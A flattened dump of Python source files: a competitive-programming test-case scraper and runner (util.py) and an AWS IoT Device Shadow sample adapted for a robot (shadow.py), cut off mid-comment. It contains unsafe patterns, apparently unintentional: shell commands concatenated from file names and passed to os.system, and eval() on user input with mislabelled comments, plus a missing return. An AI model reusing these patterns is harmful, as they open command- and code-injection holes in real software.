# class approach for dynamic plotting import multiprocessing import test_dynamic_plotting as plotter import test_optmizing_BPM as BPM import tests_rpm as RPM BPM_proc = multiprocessing.Process(target = BPM.run_it) plotter_proc = multiprocessing.Process(target = plotter.run_it) RPM_proc = multiprocessing.Process(target = RPM.run_it) BPM_proc.start() RPM_proc.start() plotter_proc.start() ### need to make dynamic plotter and bpm callable
util.py
# coding: utf-8 import sys import json import re import os import functools import platform import threading try: from bs4 import BeautifulSoup as bs import requests as rq from argparse import ArgumentParser except: err = """ You haven't installed the required dependencies. Run 'python setup.py install' to install the dependencies. """ print(err) sys.exit(0) class Utilities: cache_dir = os.path.join(os.path.expanduser('~'), '.cache', 'ACedIt') colors = { 'GREEN': '\033[92m', 'YELLOW': '\033[93m', 'RED': '\033[91m', 'ENDC': '\033[0m', 'BOLD': '\033[1m', } @staticmethod def parse_flags(supported_sites): """ Utility function to parse command line flags """ parser = ArgumentParser() parser.add_argument('-s', '--site', dest='site', choices=supported_sites, help='The competitive programming platform, e.g. codeforces, codechef etc') parser.add_argument('-c', '--contest', dest='contest', help='The name of the contest, e.g. JUNE17, LTIME49, COOK83 etc') parser.add_argument('-p', '--problem', dest='problem', help='The problem code, e.g. OAK, PRMQ etc') parser.add_argument('-f', '--force', dest='force', action='store_true', help='Force download the test cases, even if they are cached') parser.add_argument('--run', dest='source_file', help='Name of source file to be run') parser.add_argument('--set-default-site', dest='default_site', choices=supported_sites, help='Name of default site to be used when -s flag is not specified') parser.add_argument('--set-default-contest', dest='default_contest', help='Name of default contest to be used when -c flag is not specified') parser.add_argument('--clear-cache', dest='clear_cache', action='store_true', help='Clear cached test cases for a given site. Takes default site if -s flag is omitted') parser.set_defaults(force=False, clear_cache=False) args = parser.parse_args() flags = {} if args.site is None or args.contest is None: import json site, contest = None, None try: with open(os.path.join(Utilities.cache_dir, 'constants.json'), 'r') as f: data = f.read() data = json.loads(data) site = data.get( 'default_site', None) if args.site is None else args.site contest = data.get( 'default_contest', None) if args.contest is None else args.contest except: pass flags['site'] = site flags['contest'] = contest if not site == 'spoj' else None else: flags['site'] = args.site flags['contest'] = args.contest flags['problem'] = args.problem flags['force'] = args.force flags['clear_cache'] = args.clear_cache flags['source'] = args.source_file flags['default_site'] = args.default_site flags['default_contest'] = args.default_contest return flags @staticmethod def set_constants(key, value): """ Utility method to set default site and contest """ with open(os.path.join(Utilities.cache_dir, 'constants.json'), 'r+') as f: data = f.read() data = json.loads(data) data[key] = value f.seek(0) f.write(json.dumps(data, indent=2)) f.truncate() print('Set %s to %s' % (key, value)) @staticmethod def check_cache(site, contest, problem): """ Method to check if the test cases already exist in cache If not, create the directory structure to store test cases """ if problem is None: if not os.path.isdir(os.path.join(Utilities.cache_dir, site, contest)): os.makedirs(os.path.join(Utilities.cache_dir, site, contest)) return False # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest if os.path.isdir(os.path.join(Utilities.cache_dir, site, contest, problem)): return True else: os.makedirs(os.path.join(Utilities.cache_dir, site, contest, problem)) return False @staticmethod def clear_cache(site): """ Method to clear cached test cases """ confirm = input( 'Remove entire cache for site %s? (y/N) : ' % (site)) if confirm == 'y': from shutil import rmtree try: rmtree(os.path.join(Utilities.cache_dir, site)) except: print('Some error occured. Try again.') return os.makedirs(os.path.join(Utilities.cache_dir, site)) print('Done.') @staticmethod def store_files(site, contest, problem, inputs, outputs): """ Method to store the test cases in files """ # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest for i, inp in enumerate(inputs): filename = os.path.join( Utilities.cache_dir, site, contest, problem, 'Input' + str(i)) with open(filename, 'w') as handler: handler.write(inp) for i, out in enumerate(outputs): filename = os.path.join( Utilities.cache_dir, site, contest, problem, 'Output' + str(i)) with open(filename, 'w') as handler: handler.write(out) @staticmethod def download_problem_testcases(args): """ Download test cases for a given problem """ if args['site'] == 'codeforces': platform = Codeforces(args) elif args['site'] == 'codechef': platform = Codechef(args) elif args['site'] == 'spoj': platform = Spoj(args) elif args['site'] == 'atcoder': platform = AtCoder(args) else: platform = Hackerrank(args) is_in_cache = Utilities.check_cache( platform.site, platform.contest, platform.problem) if not args['force'] and is_in_cache: print('Test cases found in cache...') sys.exit(0) platform.scrape_problem() @staticmethod def download_contest_testcases(args): """ Download test cases for all problems in a given contest """ if args['site'] == 'codeforces': platform = Codeforces(args) elif args['site'] == 'codechef': platform = Codechef(args) elif args['site'] == 'hackerrank': platform = Hackerrank(args) elif args['site'] == 'atcoder': platform = AtCoder(args) Utilities.check_cache( platform.site, platform.contest, platform.problem) platform.scrape_contest() @staticmethod def input_file_to_string(path, num_cases): """ Method to return sample inputs as a list """ inputs = [] for i in range(num_cases): with open(os.path.join(path, 'Input' + str(i)), 'r') as fh: inputs += [fh.read()] return inputs @staticmethod def cleanup(num_cases, basename, extension): """ Method to clean up temporarily created files """ for i in range(num_cases): if os.path.isfile('temp_output' + str(i)): os.remove('temp_output' + str(i)) if extension == 'java': os.system('rm ' + basename + '*.class') if extension == 'cpp': os.system('rm ' + basename) @staticmethod def handle_kbd_interrupt(site, contest, problem): """ Method to handle keyboard interrupt """ from shutil import rmtree print('Cleaning up...') # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest if problem is not None: path = os.path.join(Utilities.cache_dir, site, contest, problem) if os.path.isdir(path): rmtree(path) else: path = os.path.join(Utilities.cache_dir, site, contest) if os.path.isdir(path): rmtree(path) print('Done. Exiting gracefully.') @staticmethod def run_solution(args): """ Method to run and test the user's solution against sample cases """ problem = args['source'] extension = problem.split('.')[-1] problem = problem.split('.')[0] basename = problem.split('/')[-1] problem_path = os.path.join(os.getcwd(), problem) if not os.path.isfile(problem_path + '.' + extension): print('ERROR : No such file') sys.exit(0) problem_code = args['problem'] if args['problem'] else basename contest_code = '' if args['site'] == 'spoj' else args['contest'] testcases_path = os.path.join(Utilities.cache_dir, args[ 'site'], contest_code, problem_code) if os.path.isdir(testcases_path): num_cases = len(os.listdir(testcases_path)) // 2 results, expected_outputs, user_outputs = [], [], [] if extension in ['c', 'cpp', 'java', 'py', 'hs', 'rb']: # Compiler flags taken from http://codeforces.com/blog/entry/79 compiler = { 'hs': 'ghc --make -O -dynamic -o ' + basename, 'py': None, 'rb': None, 'c': '/usr/local/bin/gcc-9 -DONLINE_JUDGE -fno-asm -lm -O2 -o ' + basename, 'cpp': '/usr/local/bin/g++-9 -DONLINE_JUDGE -lm -x c++ -O2 -std=c++14 -o ' + basename, 'java': 'javac -d .' }[extension] execute_command = { 'py': 'python \'' + problem_path + '.' + extension + '\'', 'rb': 'ruby \'' + problem_path + '.' + extension + '\'', 'hs': './' + basename, 'c': './' + basename, 'cpp': './' + basename, 'java': 'java -DONLINE_JUDGE=true -Duser.language=en -Duser.region=US -Duser.variant=US ' + basename }[extension] if compiler is None: compile_status = 0 else: compile_status = os.system( compiler + ' \'' + problem_path + '.' + extension + '\'') if compile_status == 0: # Compiled successfully timeout_command = 'timeout' if platform.system() == 'Linux' else 'gtimeout' for i in range(num_cases): status = os.system(timeout_command + ' 2s ' + execute_command + ' < ' + os.path.join( testcases_path, 'Input' + str(i)) + ' > temp_output' + str(i)) with open(os.path.join(testcases_path, 'Output' + str(i)), 'r') as out_handler: expected_output = out_handler.read().strip().split('\n') expected_output = '\n'.join( [line.strip() for line in expected_output]) expected_outputs += [expected_output] if status == 31744: # Time Limit Exceeded results += [Utilities.colors['BOLD'] + Utilities.colors[ 'YELLOW'] + 'TLE' + Utilities.colors['ENDC']] user_outputs += [''] elif status == 0: # Ran successfully with open('temp_output' + str(i), 'r') as temp_handler: user_output = temp_handler.read().strip().split('\n') user_output = '\n'.join( [line.strip() for line in user_output]) user_outputs += [user_output] if expected_output == user_output: # All Correct results += [Utilities.colors['BOLD'] + Utilities.colors[ 'GREEN'] + 'AC' + Utilities.colors['ENDC']] else: # Wrong Answer results += [Utilities.colors['BOLD'] + Utilities.colors[ 'RED'] + 'WA' + Utilities.colors['ENDC']] else: # Runtime Error results += [Utilities.colors['BOLD'] + Utilities.colors['RED'] + 'RTE' + Utilities.colors['ENDC']] user_outputs += [''] else: # Compilation error occurred message = Utilities.colors['BOLD'] + Utilities.colors[ 'RED'] + 'Compilation error. Not run against test cases' + Utilities.colors['ENDC'] + '.' print(message) sys.exit(0) else: print('Supports only C, C++, Python, Java, Ruby and Haskell as of now.') sys.exit(0) from terminaltables import AsciiTable table_data = [['Serial No', 'Input', 'Expected Output', 'Your Output', 'Result']] inputs = Utilities.input_file_to_string(testcases_path, num_cases) for i in range(num_cases): row = [ i + 1, inputs[i], expected_outputs[i], user_outputs[i] if any(sub in results[i] for sub in ['AC', 'WA']) else 'N/A', results[i] ] table_data.append(row) table = AsciiTable(table_data) print(table.table) # Clean up temporary files Utilities.cleanup(num_cases, basename, extension) else: print('Test cases not found locally...') args['problem'] = problem_code args['force'] = True args['source'] = problem + '.' + extension Utilities.download_problem_testcases(args) print('Running your solution against sample cases...') Utilities.run_solution(args) @staticmethod def get_html(url): """ Utility function get the html content of an url """ sys.setrecursionlimit(10000) MAX_TRIES = 3 try: for try_count in range(MAX_TRIES): r = rq.get(url) if r.status_code == 200: break if try_count >= MAX_TRIES: print('Could not fetch content. Please try again.') sys.exit(0) except Exception as e: print('Please check your internet connection and try again.') sys.exit(0) return r class Platform: """ Base class for platforms """ def __init__(self, args): self.site = args['site'] self.contest = args['contest'] self.force_download = args['force'] self.responses = [] self.lock = threading.Lock() def get_problem_name(self, response): return response.url.split('/')[-1] def build_problem_url(self): raise NotImplementedError def parse_html(self): raise NotImplementedError def scrape_problem(self): """ Method to scrape a single problem """ contest = '' if self.site == 'spoj' else self.contest print('Fetching problem %s-%s from %s...' % (contest, self.problem, self.site)) req = Utilities.get_html(self.build_problem_url()) inputs, outputs = self.parse_html(req) Utilities.store_files(self.site, self.contest, self.problem, inputs, outputs) print('Done.') def fetch_html(self, link): r = rq.get(link) with self.lock: self.responses += [r] def handle_batch_requests(self, links): """ Method to send simultaneous requests to all problem pages """ threads = [threading.Thread(target=self.fetch_html, args=(link,)) for link in links] for t in threads: t.start() for t in threads: t.join() failed_requests = [] for response in self.responses: if response is not None and response.status_code == 200: inputs, outputs = self.parse_html(response) self.problem = self.get_problem_name(response) Utilities.check_cache(self.site, self.contest, self.problem) Utilities.store_files( self.site, self.contest, self.problem, inputs, outputs) else: failed_requests += [response.url] return failed_requests def scrape_contest(self): """ Method to scrape all problems from a given contest """ print('Checking problems available for contest %s-%s...' % (self.site, self.contest)) req = Utilities.get_html(self.build_contest_url()) links = self.get_problem_links(req) print('Found %d problems..' % (len(links))) if not self.force_download: cached_problems = os.listdir(os.path.join( Utilities.cache_dir, self.site, self.contest)) links = [link for link in links if link.split( '/')[-1] not in cached_problems] failed_requests = self.handle_batch_requests(links) if len(failed_requests) > 0: self.handle_batch_requests(failed_requests) class Codeforces(Platform): """ Class to handle downloading of test cases from Codeforces """ def __init__(self, args): self.problem = args['problem'] super(Codeforces, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a codeforces problem """ soup = bs(req.text, 'html.parser') inputs = soup.findAll('div', {'class': 'input'}) outputs = soup.findAll('div', {'class': 'output'}) if len(inputs) == 0 or len(outputs) == 0: print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) repls = ('<br>', '\n'), ('<br/>', '\n'), ('</br>', '') formatted_inputs, formatted_outputs = [], [] for inp in inputs: pre = inp.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) formatted_inputs += [pre] for out in outputs: pre = out.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) formatted_outputs += [pre] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given codeforces contest """ soup = bs(req.text, 'html.parser') table = soup.find('table', {'class': 'problems'}) if table is None: print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = ['http://codeforces.com' + td.find('a')['href'] for td in table.findAll('td', {'class': 'id'})] return links def build_problem_url(self): contest_type = 'contest' if int(self.contest) <= 100000 else 'gym' return 'http://codeforces.com/%s/%s/problem/%s' % (contest_type, self.contest, self.problem) def build_contest_url(self): contest_type = 'contest' if int(self.contest) <= 100000 else 'gym' return 'http://codeforces.com/%s/%s' % (contest_type, self.contest) class Codechef(Platform): """ Class to handle downloading of test cases from Codechef """ def __init__(self, args): self.problem = args['problem'] super(Codechef, self).__init__(args) def _extract(self, data, marker): data_low = data.lower() extracts = [] idx = data_low.find(marker, 0) while not idx == -1: start = data_low.find('```', idx) end = data_low.find('```', start + 3) extracts += [data[start + 3:end]] idx = data_low.find(marker, end) return [extract.strip() for extract in extracts] def parse_html(self, req): """ Method to parse the html and get test cases from a codechef problem """ try: data = str(json.loads(req.text)['body']) except (KeyError, ValueError): print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) inputs = self._extract(data, 'example input') outputs = self._extract(data, 'example output') return inputs, outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given codechef contest """ soup = bs(req.text, 'html.parser') table = soup.find('table', {'class': 'dataTable'}) if table is None: print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = [div.find('a')['href'] for div in table.findAll('div', {'class': 'problemname'})] links = ['https://codechef.com/api/contests/' + self.contest + '/problems/' + link.split('/')[-1] for link in links] return links def build_problem_url(self): return 'https://codechef.com/api/contests/%s/problems/%s' % (self.contest, self.problem) def build_contest_url(self): return 'https://codechef.com/%s' % self.contest class Spoj(Platform): """ Class to handle downloading of test cases from Spoj """ def __init__(self, args): self.problem = args['problem'].upper() super(Spoj, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a spoj problem """ soup = bs(req.text, 'html.parser') test_cases = soup.findAll('pre') if test_cases is None or len(test_cases) == 0: print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) formatted_inputs, formatted_outputs = [], [] input_list = [ '<pre>(.|\n|\r)*<b>Input:?</b>:?', '<b>Output:?</b>(.|\n|\r)*' ] output_list = [ '<pre>(.|\n|\r)*<b>Output:?</b>:?', '</pre>' ] input_regex = re.compile('(%s)' % '|'.join(input_list)) output_regex = re.compile('(%s)' % '|'.join(output_list)) for case in test_cases: inp = input_regex.sub('', str(case)) out = output_regex.sub('', str(case)) inp = re.sub('<[^<]+?>', '', inp) out = re.sub('<[^<]+?>', '', out) formatted_inputs += [inp.strip()] formatted_outputs += [out.strip()] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def build_problem_url(self): return 'http://spoj.com/problems/%s' % self.problem class Hackerrank(Platform): """ Class to handle downloading of test cases from Hackerrank """ def __init__(self, args): self.problem = '-'.join(args['problem'].split() ).lower() if args['problem'] is not None else None super(Hackerrank, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a hackerrank problem """ try: data = json.loads(req.text) soup = bs(data['model']['body_html'], 'html.parser') except (KeyError, ValueError): print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) input_divs = soup.findAll('div', {'class': 'challenge_sample_input'}) output_divs = soup.findAll('div', {'class': 'challenge_sample_output'}) inputs = [input_div.find('pre') for input_div in input_divs] outputs = [output_div.find('pre') for output_div in output_divs] regex_list = [ '<pre>(<code>)?', '(</code>)?</pre>' ] regex = re.compile('(%s)' % '|'.join(regex_list)) formatted_inputs, formatted_outputs = [], [] for inp in inputs: spans = inp.findAll('span') if len(spans) > 0: formatted_input = '\n'.join( [span.decode_contents() for span in spans]) else: formatted_input = regex.sub('', str(inp)) formatted_inputs += [formatted_input.strip()] for out in outputs: spans = out.findAll('span') if len(spans) > 0: formatted_output = '\n'.join( [span.decode_contents() for span in spans]) else: formatted_output = regex.sub('', str(out)) formatted_outputs += [formatted_output.strip()] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given hackerrank contest """ try: data = json.loads(req.text) data = data['models'] except (KeyError, ValueError): print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = ['https://www.hackerrank.com/rest/contests/' + self.contest + '/challenges/' + problem['slug'] for problem in data] return links def build_problem_url(self): return 'https://www.hackerrank.com/rest/contests/%s/challenges/%s' % (self.contest, self.problem) def build_contest_url(self): 'https://www.hackerrank.com/rest/contests/%s/challenges' % self.contest class AtCoder(Platform): """ Class to handle downloading of test cases from atcoder """ def __init__(self, args): self.problem = args['problem'] super(AtCoder, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a atcoder problem """ soup = bs(req.text, 'html.parser') inouts= soup.findAll('div', {'class': 'part'}) repls = ('<br>', '\n'), ('<br/>', '\n'), ('</br>', '') formatted_inputs, formatted_outputs = [], [] inouts = filter((lambda x: x.find('section') and x.find('section').find('h3')), inouts) for inp in inouts: if inp.find('section').find('h3').text[:3] == "入力例": pre = inp.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) pre = pre.replace("&amp;", "&") pre = pre.replace("&lt;", "<") pre = pre.replace("&gt;", ">") formatted_inputs += [pre] if inp.find('section').find('h3').text[:3] == "出力例": pre = inp.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) pre = pre.replace("&amp;", "&") pre = pre.replace("&lt;", "<") pre = pre.replace("&gt;", ">") formatted_outputs += [pre] return formatted_inputs, formatted_outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given atcoder contest """ soup = bs(req.text, 'html.parser') table = soup.find('tbody') if table is None: print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = ['http://beta.atcoder.jp' + td.find('a')['href'] for td in soup.findAll('td', {'class': 'text-center no-break'})] return links def get_problem_name(self, response): """ Method to get the names for the problems in a given atcoder contest """ soup = bs(response.text, 'html.parser') return soup.find('title').get_text()[0].lower() def build_problem_url(self): return 'https://beta.atcoder.jp/contests/%s/tasks/%s' % (self.contest, self.problem) def build_contest_url(self): return 'https://beta.atcoder.jp/contests/%s/tasks/' % self.contest
shadow.py
#!/usr/bin/env python # 2020 March 1 - modified and adapted for robot by Tal G. Ball, # Maintaining Apache License, Version 2 and Amazon's Copyright Notice # Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/apache2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. import argparse from awscrt import auth, io, mqtt, http from awsiot import iotshadow from awsiot import mqtt_connection_builder from concurrent.futures import Future import sys import threading import multiprocessing import traceback import time import queue import logging # - Overview - # This sample uses the AWS IoT Device Shadow Service to keep a property in # sync between device and server. Imagine a light whose color may be changed # through an app, or set by a local user. # # - Instructions - # Once connected, type a value in the terminal and press Enter to update # the property's "reported" value. The sample also responds when the "desired" # value changes on the server. To observe this, edit the Shadow document in # the AWS Console and set a new "desired" value. # # - Detail - # On startup, the sample requests the shadow document to learn the property's # initial state. The sample also subscribes to "delta" events from the server, # which are sent when a property's "desired" value differs from its "reported" # value. When the sample learns of a new desired value, that value is changed # on the device and an update is sent to the server with the new "reported" # value. parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server") parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " + "Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"") parser.add_argument('--cert', help="File path to your client certificate, in PEM format") parser.add_argument('--key', help="File path to your private key file, in PEM format") parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " + "Necessary if MQTT server uses a certificate that's not already in " + "your trust store") parser.add_argument('--client-id', default='samples-client-id', help="Client ID for MQTT connection.") parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing") parser.add_argument('--shadow-property', default="telemetry", help="Name of property in shadow to keep in sync") parser.add_argument('--use-websocket', default=False, action='store_true', help="To use a websocket instead of raw mqtt. If you " + "specify this option you must specify a region for signing, you can also enable proxy mode.") parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " + "is the region that will be used for computing the Sigv4 signature") parser.add_argument('--proxy-host', help="Hostname for proxy to connect to. Note: if you use this feature, " + "you will likely need to set --root-ca to the ca for your proxy.") parser.add_argument('--proxy-port', type=int, default=8080, help="Port for proxy to connect to.") parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name, help='Logging level') parser.add_argument('--robot-url', required=True, help="Robot url for retrieving the telemetry") parser.add_argument('--robot-ca', required=True, help="Root certificate for robot telemetry") # Tal G. Ball - heavily reorganizing to support multiprocessing proc_name = multiprocessing.current_process().name # print("Process Name in shadow is %s" % proc_name) SHADOW_VALUE_DEFAULT = "off" class LockedData(object): def __init__(self): self.lock = threading.Lock() self.shadow_value = None self.disconnect_called = False self.stop = False class ShadowOps(object): def __init__(self, args, shadow_command_q): self.args = args self.shadow_command_q = shadow_command_q print("Initializing shadow operations") logging.info("Initializing shadow operations") if not args.verbosity: args.verbosity = io.LogLevel.NoLogs.name io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr') print("Set aws logging to %s" % args.verbosity) logging.info("Set aws logging to %s" % args.verbosity) self.mqtt_connection = None self.shadow_client = None self.robot_client = args.robot_client self.thing_name = args.thing_name self.shadow_property = args.shadow_property self.telemetry_thread = None self.is_sample_done = threading.Event() self.locked_data = LockedData() self.shadow_command_thread = threading.Thread(target=self.wait_to_end_shadow, name="Shadow Command Thread") logging.debug("Starting Shadow Command Thread") self.shadow_command_thread.start() # logging.debug("Starting Shadow Operations Main") self.main(self.args) # Function for gracefully quitting this sample def exit(self, msg_or_exception): if isinstance(msg_or_exception, Exception): logging.debug("Exiting sample due to exception.") traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2]) else: logging.debug("Exiting sample:", msg_or_exception) with self.locked_data.lock: if not self.locked_data.disconnect_called: print("Disconnecting...") logging.info("Disconnecting...") self.locked_data.disconnect_called = True future = self.mqtt_connection.disconnect() future.add_done_callback(self.on_disconnected) self.args.robot_client.post("Shutdown") def on_disconnected(self, disconnect_future): # type: (Future) -> None print("Disconnected.") logging.debug("Disconnected.") # Signal that sample is finished self.is_sample_done.set() def on_get_shadow_accepted(self, response): # type: (iotshadow.GetShadowResponse) -> None try: # logging.debug("Finished getting initial shadow state.") with self.locked_data.lock: if self.locked_data.shadow_value is not None: # logging.debug(" Ignoring initial query because a delta event has already been received.") return if response.state: if response.state.delta: value = response.state.delta.get(self.shadow_property) if value: logging.debug(" Shadow contains delta value '{}'.".format(value)) self.change_shadow_value(value) return if response.state.reported: value = response.state.reported.get(self.shadow_property) if value: logging.debug(" Shadow contains reported value '{}'.".format(value)) self.set_local_value_due_to_initial_query(response.state.reported[self.shadow_property]) return logging.debug(" Shadow document lacks '{}' property. Setting defaults...".format(self.shadow_property)) self.change_shadow_value(SHADOW_VALUE_DEFAULT) return except Exception as e: self.exit(e) def on_get_shadow_rejected(self, error): # type: (iotshadow.ErrorResponse) -> None if error.code == 404: logging.debug("Thing has no shadow document. Creating with defaults...") self.change_shadow_value(SHADOW_VALUE_DEFAULT) else: self.exit("Get request was rejected. code:{} message:'{}'".format( error.code, error.message)) def on_shadow_delta_updated(self, delta): # type: (iotshadow.ShadowDeltaUpdatedEvent) -> None try: logging.debug("Received shadow delta event.") if delta.state and (self.shadow_property in delta.state): value = delta.state[self.shadow_property] if value is None: logging.debug(" Delta reports that '{}' was deleted. Resetting defaults...".format(self.shadow_property)) self.change_shadow_value(SHADOW_VALUE_DEFAULT) return else: logging.debug(" Delta reports that desired value is '{}'. Changing local value...".format(value)) self.change_shadow_value(value) else: logging.debug(" Delta did not report a change in '{}'".format(self.shadow_property)) except Exception as e: self.exit(e) def on_publish_update_shadow(self, future): #type: (Future) -> None try: future.result() logging.debug("Update request published.") except Exception as e: logging.debug("Failed to publish update request.") self.exit(e) def on_update_shadow_accepted(self, response): # type: (iotshadow.UpdateShadowResponse) -> None try: logging.debug("Finished updating reported shadow value to '{}'.".format(response.state.reported[self.shadow_property])) # type: ignore # print("Enter desired value: ") # remind user they can input new values except: self.exit("Updated shadow is missing the target property.") def on_update_shadow_rejected(self, error): # type: (iotshadow.ErrorResponse) -> None self.exit("Update request was rejected. code:{} message:'{}'".format( error.code, error.message)) def set_local_value_due_to_initial_query(self, reported_value): with self.locked_data.lock: self.locked_data.shadow_value = reported_value # print("Enter desired value: ") # remind user they can input new values def change_shadow_value(self,value): with self.locked_data.lock: if self.locked_data.shadow_value == value: logging.debug("Local value is already '{}'.".format(value)) # print("Enter desired value: ") # remind user they can input new values return logging.debug("Changed local shadow value to '{}'.".format(value)) self.locked_data.shadow_value = value logging.debug("Updating reported shadow value to '{}'...".format(value)) request = iotshadow.UpdateShadowRequest( thing_name=self.thing_name, state=iotshadow.ShadowState( reported={ self.shadow_property: value }, desired={ self.shadow_property: value }, ) ) future = self.shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE) future.add_done_callback(self.on_publish_update_shadow) def user_input_thread_fn(self): while True: try: # Read user input try: new_value = input() # python 2 only except NameError: new_value = eval(input()) # python 3 only # If user wants to quit sample, then quit. # Otherwise change the shadow value. if new_value in ['exit', 'quit']: self.exit("User has quit") break else: self.change_shadow_value(new_value) except Exception as e: logging.debug("Exception on input thread.") self.exit(e) break def get_robot_telemetry(self, robot_url=None, ca=None): while True: if self.locked_data.stop == True: # print("Calling exit from telemetry thread") # print("Live Threads:\n\t") # print("%s" % threading.enumerate()) self.exit('Shutting down shadow updates') break try: response = self.robot_client.get() if response: self.change_shadow_value(response[0]) except Exception as e: logging.debug("Exception on getting telemetry") self.exit(e) break time.sleep(5.0) def wait_to_end_shadow(self): # print("Patiently waiting to end shadow operations") while True: task = self.shadow_command_q.get() if task == "Shutdown": with self.locked_data.lock: self.locked_data.stop = True # logging.debug("Shadow stop signaled") self.shadow_command_q.task_done() break else: self.shadow_command_q.task_done() return def main(self, args): # logging.debug("Spinning up Shadow awsiot resources") event_loop_group = io.EventLoopGroup(1) host_resolver = io.DefaultHostResolver(event_loop_group) client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver) # logging.debug("Shadow resources up") if args.use_websocket == True: proxy_options = None if (args.proxy_host): proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port) credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap) self.mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing( endpoint=args.endpoint, client_bootstrap=client_bootstrap, region=args.signing_region, credentials_provider=credentials_provider, websocket_proxy_options=proxy_options, ca_filepath=args.root_ca, client_id=args.client_id, clean_session=False, keep_alive_secs=6) else: # attrs = vars(args) # print(', '.join("%s: %s" % item for item in list(attrs.items()))) self.mqtt_connection = mqtt_connection_builder.mtls_from_path( endpoint=args.endpoint, cert_filepath=args.cert, pri_key_filepath=args.key, client_bootstrap=client_bootstrap, ca_filepath=args.root_ca, client_id=args.client_id, clean_session=False, keep_alive_secs=6) print("Connecting to {} with client ID '{}'...".format( args.endpoint, args.client_id)) logging.debug("Connecting to {} with client ID '{}'...".format( args.endpoint, args.client_id)) connected_future = self.mqtt_connection.connect() self.shadow_client = iotshadow.IotShadowClient(self.mqtt_connection) # Wait for connection to be fully established. # Note that it's not necessary to wait, commands issued to the # mqtt_connection before its fully connected will simply be queued. # But this sample waits here so it's obvious when a connection # fails or succeeds. connected_future.result() print("Connected!") logging.debug("Connected!") try: # Subscribe to necessary topics. # Note that is **is** important to wait for "accepted/rejected" subscriptions # to succeed before publishing the corresponding "request". # print("Subscribing to Delta events...") delta_subscribed_future, _ = self.shadow_client.subscribe_to_shadow_delta_updated_events( request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_shadow_delta_updated) # Wait for subscription to succeed delta_subscribed_future.result() # print("Subscribing to Update responses...") update_accepted_subscribed_future, _ = self.shadow_client.subscribe_to_update_shadow_accepted( request=iotshadow.UpdateShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_update_shadow_accepted) update_rejected_subscribed_future, _ = self.shadow_client.subscribe_to_update_shadow_rejected( request=iotshadow.UpdateShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_update_shadow_rejected) # Wait for subscriptions to succeed update_accepted_subscribed_future.result() update_rejected_subscribed_future.result() # print("Subscribing to Get responses...") get_accepted_subscribed_future, _ = self.shadow_client.subscribe_to_get_shadow_accepted( request=iotshadow.GetShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_get_shadow_accepted) get_rejected_subscribed_future, _ = self.shadow_client.subscribe_to_get_shadow_rejected( request=iotshadow.GetShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_get_shadow_rejected) # Wait for subscriptions to succeed get_accepted_subscribed_future.result() get_rejected_subscribed_future.result() # The rest of 